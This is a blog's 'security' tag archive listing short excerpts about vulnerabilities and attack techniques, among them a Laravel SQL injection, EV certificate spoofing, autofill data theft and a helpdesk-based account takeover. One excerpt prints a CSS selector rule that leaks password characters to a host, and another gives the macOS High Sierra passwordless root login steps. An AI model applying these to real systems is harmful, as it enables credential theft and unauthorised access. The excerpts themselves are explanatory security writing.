Tag Archives: security
Recently the folks from Spatie released a security update for their laravel-query-builder package. Turns out it was vulnerable to SQL Injection. At the core of the vulnerability is the fact that Laravel offers a shorthand for querying only certain fields of JSON data, but that these do not get escaped when converted to a json_extract …
The curious case of the Raspberry Pi in the network closet
Christian Haschek: Last week I got a message from a co-worker notifying me there was a Raspberry Pi connected to our network. I asked my IT colleagues and they were as baffled as I was. I heard of people getting paid to put things like this in places they shouldn’t and for this reason I …
The problem with usernames
In “Let’s talk about usernames” James Bennett – author of django-registration – digs deeper into an at first seemingly simple thing such as usernames and how to keep them safe and unique. And no, you can’t make it by just doing a simple comparison. You’ll have to think of more than that if you …
CSS Keylogger (and why you shouldn’t worry about it)
Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type="password"] elements whose last character is an a: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } The theory goes that whenever a user presses the a character inside an input[type="password"], a request to …
Extended Validation Is Broken
https://stripe.ian.sh/ is an interesting site by Ian Carroll. See it? Take a closer look at the certificate. Yes, that’s one for “Stripe, Inc” … but, that’s not “Stripe, Inc” is it? This site uses an EV certificate for “Stripe, Inc”, that was legitimately issued by Comodo. However, when you hear “Stripe, Inc”, you are probably …
“Username or Password Incorrect” is Bullshit
There’s a security best practice where sign ins aren’t supposed to say “password is incorrect”. Instead they’re supposed to say the “username or password is incorrect”. This “best practice” is bullshit. […] You gain no security, yet your customers lose clarity. At first I raised my eyebrow when reading this, yet it became clear rather …
Stealing Usernames, Passwords, and other (Personal) Data via Browsers and NPM Packages
👋 This post also got published on Medium. If you like it, please give it some love with a clap over there. Late 2016, Stoyan Stefanov published “Oversharing with the browser’s autofill”. It’s an article on stealing personal data using the browser’s form autofill feature. The attack works by abusing the fact that autocompletion …
Login with root and no password on any Mac running macOS High Sierra
This tweet is currently making rounds on Twitter: You can access it via System Preferences>Users & Groups>Click the lock to make changes. Then use "root" with no password. And try it for several times. Result is unbelievable! — Lemi Orhan Ergin (@lemiorhan) November 28, 2017 And yes, that actually works: enter root as a username, …
TIP: Enable Two Factor Authentication (2FA) with your NPM account
Since early October it’s possible to enable Two Factor Authentication with your NPM account. 2FA is another layer of defense for your account, preventing third parties from altering your code even if they steal or guess your credentials. This is one of the easiest and most important ways to ensure that only you can access …
Ticket Trick: Hacking companies through their helpdesk
Clever way, unearthed by Inti de Ceukelaire, to get access to private communication channels (such as Slack) by leveraging the create-by-email feature of issue trackers/the helpdesk of a company. First target of Inti was GitLab’s Slack channel: Anyone with a valid @gitlab.com e-mail address can join their Slack team. At the same time, GitLab offers …